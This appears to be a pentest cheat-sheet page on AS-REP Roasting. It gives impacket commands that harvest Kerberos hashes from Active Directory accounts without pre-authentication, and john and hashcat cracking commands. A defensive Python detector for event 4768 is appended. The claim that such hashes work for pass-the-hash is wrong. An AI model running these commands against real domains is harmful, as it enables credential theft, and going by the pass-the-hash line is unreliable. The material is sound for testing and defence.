AS-REP Roasting

Last modified: 2022-12-30

Active Directory Windows

AS-REP Roasting is a technique that retrieves the password hashes of Active Directory accounts for which Kerberos pre-authentication is not required.

Enumeration

List the users for which Kerberos pre-authentication is not required and retrieve their password hashes. These accounts are the ones usable for AS-REP Roasting.

# Find the password hashes of the users listed in users.txt
impacket-GetNPUsers -dc-ip <target-ip> example.local/ -no-pass -usersfile users.txt

# Find the password hash of a single user (output in hashcat format)
impacket-GetNPUsers -dc-ip <target-ip> example.local/<username> -no-pass -format hashcat

If a password hash is found, crack it.

john --format=krb5asrep --wordlist=wordlist.txt hash.txt
# or
hashcat -m 18200 -a 0 hash.txt wordlist.txt

If a password hash is found, crack it or use it to log in with pass-the-hash.
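As an added defensive counterpart to the enumeration and cracking commands above (example code written for this page, not from the original), the following checks Windows Security event 4768 records for the footprint of AS-REP Roasting: a TGT issued with pre-authentication type 0 and the RC4 encryption type (0x17) that the GetNPUsers request asks for. The event field names, the constructed sample events and the per-source grouping are assumptions.

```python
"""Detect AS-REP Roasting in Windows Security event 4768 (TGT requested).

A 4768 with PreAuthType 0 means the AS-REQ carried no pre-authentication
data, which the KDC only accepts for accounts flagged DONT_REQ_PREAUTH.
Combined with TicketEncryptionType 0x17 (RC4-HMAC, the etype john/hashcat
crack here) and a success status, it is the server-side trace of the
technique on this page. Field names follow the 4768 event data (assumed).
"""
from collections import Counter

RC4_HMAC = 0x17        # TicketEncryptionType: RC4, the offline-crackable etype
NO_PREAUTH = 0         # PreAuthType 0: no pre-authentication was performed
STATUS_OK = 0x0        # Status 0x0: TGT was issued

# Constructed sample events for this example, not real telemetry.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "svc_backup", "IpAddress": "10.0.0.50",
     "TicketEncryptionType": 0x17, "PreAuthType": 0, "Status": 0x0},
    {"EventID": 4768, "TargetUserName": "jdoe", "IpAddress": "10.0.0.50",
     "TicketEncryptionType": 0x17, "PreAuthType": 0, "Status": 0x0},
    # Normal logon: pre-auth type 2 (encrypted timestamp), AES256 ticket.
    {"EventID": 4768, "TargetUserName": "alice", "IpAddress": "10.0.0.21",
     "TicketEncryptionType": 0x12, "PreAuthType": 2, "Status": 0x0},
    # Pre-auth was enforced for this user: 0x19 = KDC_ERR_PREAUTH_REQUIRED.
    {"EventID": 4768, "TargetUserName": "bob", "IpAddress": "10.0.0.50",
     "TicketEncryptionType": 0x17, "PreAuthType": 0, "Status": 0x19},
    # Service ticket request (4769) is out of scope for this check.
    {"EventID": 4769, "TargetUserName": "alice", "IpAddress": "10.0.0.21",
     "TicketEncryptionType": 0x12, "PreAuthType": 2, "Status": 0x0},
]


def is_asrep_roast(event):
    """True when a 4768 shows a successful RC4 TGT issued without pre-auth
    to a user (not computer) account."""
    return (event.get("EventID") == 4768
            and event.get("PreAuthType") == NO_PREAUTH
            and event.get("TicketEncryptionType") == RC4_HMAC
            and event.get("Status") == STATUS_OK
            and not str(event.get("TargetUserName", "")).endswith("$"))


def find_roasted_accounts(events):
    """Return (sorted roasted user names, Counter of hits per source IP).
    Several hits from one IP in a short window suggest a usersfile sweep."""
    hits = [e for e in events if is_asrep_roast(e)]
    users = sorted({e["TargetUserName"] for e in hits})
    return users, Counter(e["IpAddress"] for e in hits)


if __name__ == "__main__":
    users, per_source = find_roasted_accounts(SAMPLE_EVENTS)
    print("accounts roasted:", users)
    print("hits per source:", dict(per_source))
```

Accounts that turn up here should have pre-authentication re-enabled (or a long random password if the flag is genuinely needed), which is the mitigation for the enumeration step above.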